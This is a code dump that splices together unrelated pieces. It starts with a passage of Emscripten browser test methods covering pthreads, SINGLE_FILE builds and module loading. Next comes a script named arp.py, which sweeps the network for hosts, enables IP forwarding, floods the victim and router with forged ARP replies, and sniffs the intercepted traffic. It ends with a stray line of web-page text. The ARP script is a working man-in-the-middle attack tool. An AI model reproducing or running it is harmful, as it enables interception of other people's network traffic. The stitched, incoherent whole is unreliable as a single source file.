self.btest('dirent/test_readdir_empty.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_threads
def test_asmfs_unistd_close(self):
self.btest('unistd/close.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_threads
def test_asmfs_unistd_access(self):
self.btest('unistd/access.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_threads
def test_asmfs_unistd_unlink(self):
# TODO: Once symlinks are supported, remove -DNO_SYMLINK=1
self.btest('unistd/unlink.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-DNO_SYMLINK=1'])
@requires_threads
def test_asmfs_test_fcntl_open(self):
self.btest('fcntl-open/src.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_asmfs_relative_paths(self):
self.btest('asmfs/relative_paths.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_threads
def test_pthread_locale(self):
for args in [
[],
['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2'],
['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2'],
]:
print("Testing with: ", args)
self.btest('pthread/test_pthread_locale.c', expected='1', args=args)
# Tests the Emscripten HTML5 API emscripten_set_canvas_element_size() and emscripten_get_canvas_element_size() functionality in singlethreaded programs.
def test_emscripten_set_canvas_element_size(self):
self.btest('emscripten_set_canvas_element_size.c', expected='1')
# Test that emscripten_get_device_pixel_ratio() is callable from pthreads (and proxies to main thread to obtain the proper window.devicePixelRatio value).
@requires_threads
def test_emscripten_get_device_pixel_ratio(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_get_device_pixel_ratio.c', expected='1', args=args)
# Tests that emscripten_run_script() variants of functions work in pthreads.
@requires_threads
def test_pthread_run_script(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_script.cpp'), expected='1', args=['-O3', '--separate-asm'] + args, timeout=30)
# Tests emscripten_set_canvas_element_size() and OffscreenCanvas functionality in different build configurations.
@requires_threads
@requires_graphics_hardware
def test_emscripten_animate_canvas_element_size(self):
for args in [
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'USE_PTHREADS=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'USE_PTHREADS=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_EXPLICIT_CONTEXT_SWAP=1'],
['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'USE_PTHREADS=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'USE_PTHREADS=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_MANUALLY_SET_ELEMENT_CSS_SIZE=1'],
]:
cmd = ['-lGL', '-O3', '-g2', '--shell-file', path_from_root('tests', 'canvas_animate_resize_shell.html'), '--separate-asm', '-s', 'GL_DEBUG=1', '--threadprofiler'] + args
print(' '.join(cmd))
self.btest('canvas_animate_resize.cpp', expected='1', args=cmd)
# Tests the absolute minimum pthread-enabled application.
@requires_threads
def test_hello_thread(self):
self.btest(path_from_root('tests', 'pthread', 'hello_thread.c'), expected='1', args=['-s', 'USE_PTHREADS=1'])
# Tests that it is possible to load the main .js file of the application manually via a Blob URL, and still use pthreads.
@requires_threads
def test_load_js_from_blob_with_pthreads(self):
# TODO: enable this with wasm, currently pthreads/atomics have limitations
src = os.path.join(self.get_dir(), 'src.c')
open(src, 'w').write(self.with_report_result(open(path_from_root('tests', 'pthread', 'hello_thread.c')).read()))
run_process([PYTHON, EMCC, 'src.c', '-s', 'USE_PTHREADS=1', '-o', 'hello_thread_with_blob_url.js', '-s', 'WASM=0'])
shutil.copyfile(path_from_root('tests', 'pthread', 'main_js_as_blob_loader.html'), os.path.join(self.get_dir(), 'hello_thread_with_blob_url.html'))
self.run_browser('hello_thread_with_blob_url.html', 'hello from thread!', '/report_result?1')
# Tests that base64 utils work in browser with no native atob function
def test_base64_atob_fallback(self):
opts = ['-s', 'SINGLE_FILE=1', '-s', 'WASM=1', '-s', "BINARYEN_METHOD='interpret-binary'"]
src = r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
REPORT_RESULT(0);
return 0;
}
'''
open('test.c', 'w').write(self.with_report_result(src))
# generate a dummy file
open('dummy_file', 'w').write('dummy')
# compile the code with the modularize feature and the preload-file option enabled
run_process([PYTHON, EMCC, 'test.c', '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file'] + opts)
open('a.html', 'w').write('''
<script>
atob = undefined;
fetch = undefined;
</script>
<script src="a.out.js"></script>
<script>
var foo = Foo();
</script>
''')
self.run_browser('a.html', '...', '/report_result?0')
# Tests that SINGLE_FILE works as intended in generated HTML (with and without Worker)
def test_single_file_html(self):
self.btest('emscripten_main_loop_setimmediate.cpp', '1', args=['-s', 'SINGLE_FILE=1', '-s', 'WASM=1', '-s', "BINARYEN_METHOD='native-wasm'"], also_proxied=True)
assert os.path.exists('test.html') and not os.path.exists('test.js') and not os.path.exists('test.worker.js')
# Tests that SINGLE_FILE works as intended with locateFile
def test_single_file_locate_file(self):
open('src.cpp', 'w').write(self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
for wasm_enabled in [True, False]:
args = [PYTHON, EMCC, 'src.cpp', '-o', 'test.js', '-s', 'SINGLE_FILE=1']
if wasm_enabled:
args += ['-s', 'WASM=1']
run_process(args)
open('test.html', 'w').write('''
<script>
var Module = {
locateFile: function (path) {
if (path.indexOf('data:') === 0) {
throw new Error('Unexpected data URI.');
}
return path;
}
};
</script>
<script src="test.js"></script>
''')
self.run_browser('test.html', None, '/report_result?0')
# Tests that SINGLE_FILE works as intended in a Worker in JS output
def test_single_file_worker_js(self):
open('src.cpp', 'w').write(self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
run_process([PYTHON, EMCC, 'src.cpp', '-o', 'test.js', '--proxy-to-worker', '-s', 'SINGLE_FILE=1', '-s', 'WASM=1', '-s', "BINARYEN_METHOD='native-wasm'"])
open('test.html', 'w').write('<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
assert os.path.exists('test.js') and not os.path.exists('test.worker.js')
def test_access_file_after_heap_resize(self):
open('test.txt', 'w').write('hello from file')
open('page.c', 'w').write(self.with_report_result(open(path_from_root('tests', 'access_file_after_heap_resize.c'), 'r').read()))
run_process([PYTHON, EMCC, 'page.c', '-s', 'WASM=1', '-s', 'ALLOW_MEMORY_GROWTH=1', '--preload-file', 'test.txt', '-o', 'page.html'])
self.run_browser('page.html', 'hello from file', '/report_result?15')
# with separate file packager invocation, letting us affect heap copying
# or lack thereof
for file_packager_args in [[], ['--no-heap-copy']]:
print(file_packager_args)
run_process([PYTHON, FILE_PACKAGER, 'data.js', '--preload', 'test.txt', '--js-output=' + 'data.js'] + file_packager_args)
run_process([PYTHON, EMCC, 'page.c', '-s', 'WASM=1', '-s', 'ALLOW_MEMORY_GROWTH=1', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM=1'])
self.run_browser('page.html', 'hello from file', '/report_result?15')
def test_unicode_html_shell(self):
open(self.in_dir('main.cpp'), 'w').write(self.with_report_result(r'''
int main() {
REPORT_RESULT(0);
return 0;
}
'''))
open(self.in_dir('shell.html'), 'w').write(open(path_from_root('src', 'shell.html')).read().replace('Emscripten-Generated Code', 'Emscripten-Generated Emoji 😅'))
subprocess.check_output([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'shell.html', '-o', 'test.html'])
self.run_browser('test.html', None, '/report_result?0')
# Tests the functionality of the emscripten_thread_sleep() function.
@requires_threads
def test_emscripten_thread_sleep(self):
self.btest(path_from_root('tests', 'pthread', 'emscripten_thread_sleep.c'), expected='1', args=['-s', 'USE_PTHREADS=1'])
# Tests that Emscripten-compiled applications can be run from a relative path in browser that is different than the address of the current page
def test_browser_run_from_different_directory(self):
src = open(path_from_root('tests', 'browser_test_hello_world.c')).read()
open('test.c', 'w').write(self.with_report_result(src))
run_process([PYTHON, EMCC, 'test.c', '-o', 'test.html', '-O3'])
if not os.path.exists('subdir'):
os.mkdir('subdir')
shutil.move('test.js', os.path.join('subdir', 'test.js'))
shutil.move('test.wasm', os.path.join('subdir', 'test.wasm'))
src = open('test.html').read()
# Make sure JS is loaded from subdirectory
open('test-subdir.html', 'w').write(src.replace('test.js', 'subdir/test.js'))
self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but asynchronous because of `-s MODULARIZE=1`
def test_browser_run_from_different_directory_async(self):
src = open(path_from_root('tests', 'browser_test_hello_world.c')).read()
open('test.c', 'w').write(self.with_report_result(src))
for args, creations in [
(['-s', 'MODULARIZE=1'], [
'Module();', # documented way for using modularize
'new Module();' # not documented as working, but we support it
]),
(['-s', 'MODULARIZE_INSTANCE=1'], ['']) # instance: no need to create anything
]:
print(args)
# compile the code with the modularize feature and the preload-file option enabled
run_process([PYTHON, EMCC, 'test.c', '-o', 'test.js', '-O3'] + args)
if not os.path.exists('subdir'):
os.mkdir('subdir')
shutil.move('test.js', os.path.join('subdir', 'test.js'))
shutil.move('test.wasm', os.path.join('subdir', 'test.wasm'))
for creation in creations:
print(creation)
# Make sure JS is loaded from subdirectory
open('test-subdir.html', 'w').write('''
<script src="subdir/test.js"></script>
<script>
%s
</script>
''' % creation)
self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but
# also also we eval the initial code, so currentScript is not present. That prevents us
# from finding the file in a subdir, but here we at least check we do not regress compared to the
# normal case of finding in the current dir.
def test_browser_modularize_no_current_script(self):
src = open(path_from_root('tests', 'browser_test_hello_world.c')).read()
open('test.c', 'w').write(self.with_report_result(src))
# test both modularize (and creating an instance) and modularize-instance
# (which creates by itself)
for path, args, creation in [
([], ['-s', 'MODULARIZE=1'], 'Module();'),
([], ['-s', 'MODULARIZE_INSTANCE=1'], ''),
(['subdir'], ['-s', 'MODULARIZE=1'], 'Module();'),
(['subdir'], ['-s', 'MODULARIZE_INSTANCE=1'], ''),
]:
print(path, args, creation)
filesystem_path = os.path.join('.', *path)
if not os.path.exists(filesystem_path):
os.makedirs(filesystem_path)
# compile the code with the modularize feature and the preload-file option enabled
run_process([PYTHON, EMCC, 'test.c', '-o', 'test.js'] + args)
shutil.move('test.js', os.path.join(filesystem_path, 'test.js'))
shutil.move('test.wasm', os.path.join(filesystem_path, 'test.wasm'))
open(os.path.join(filesystem_path, 'test.html'), 'w').write('''
<script>
setTimeout(function() {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'test.js', false);
xhr.send(null);
eval(xhr.responseText);
%s
}, 1);
</script>
''' % creation)
self.run_browser('/'.join(path + ['test.html']), None, '/report_result?0')
def test_modularize_Module_input(self):
self.btest(path_from_root('tests', 'browser', 'modularize_Module_input.cpp'), '0', args=['--shell-file', path_from_root('tests', 'browser', 'modularize_Module_input.html'), '-s', 'MODULARIZE_INSTANCE=1'])
|
arp.py | from scapy.all import *
import sys
import os
import time
import sniff as capture
import threading
interface = sys.argv[1]
os.system("python nmap_ping.py " + interface)
with open('result_ping.txt', 'r') as myfile:
victimsLines = myfile.readlines()
for victimLine in victimsLines:
victim_ip = victimLine.split(' -- ')[0]
victim_mac = victimLine.split(' -- ')[1]
#print (victim_mac)
with open('result_ping.txt', 'r') as file:
list = file.readlines()
router_specs = ".1 --"
list_router = [ip_mac for ip_mac in list if router_specs in ip_mac]
for router in list_router:
router_ip = router.split(" -- ")[0]
router_mac = router.split(" -- ")[1]
print (router_ip)
print (router_mac)
print ("\n[*] Enabling IP Forwarding...\n")
os.system("echo 1 > /proc/sys/net/ipv4/ip_forward")
def reARP():
print ("\n[*] Restoring Targets...")
send(ARP(op = 2, pdst = router_ip, psrc = victim_ip, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = victim_mac), count = 7)
send(ARP(op = 2, pdst = victim_ip, psrc = router_ip, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = router_mac), count = 7)
print ("[*] Disabling IP Forwarding...")
os.system("echo 0 > /proc/sys/net/ipv4/ip_forward")
print ("[*] Shutting Down...")
sys.exit(1)
def trick(gm, vm):
while 1:
conf.verb = 0
send(ARP(op = 2, pdst = victim_ip, psrc = router_ip, hwdst= vm))
send(ARP(op = 2, pdst = router_ip, psrc = victim_ip, hwdst= gm))
def mitm():
try:
victim_mac
except Exception:
os.system("echo 0 > /proc/sys/net/ipv4/ip_forward")
print ("[!] Couldn't Find Victim MAC Address")
print ("[!] Exiting...")
sys.exit(1)
try:
router_mac
except Exception:
os.system("echo 0 > /proc/sys/net/ipv4/ip_forward")
print ("[!] Couldn't Find Gateway MAC Address")
print ("[!] Exiting...")
sys.exit(1)
print ("[*] Poisoning Targets...")
poison_thread = threading.Thread(target=trick, args=(router_mac, victim_mac))
poison_thread.start()
try: #trick(router_mac, victim_mac)
time.sleep(1.5)
#sniff(prn=get_url.process_tcp_packet)
sniff(iface=interface, prn=capture.check_pkt, store=0)
#sniff(iface=interface, prn=captures.processPacket, store=0)
except KeyboardInterrupt:
reARP()
mitm()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.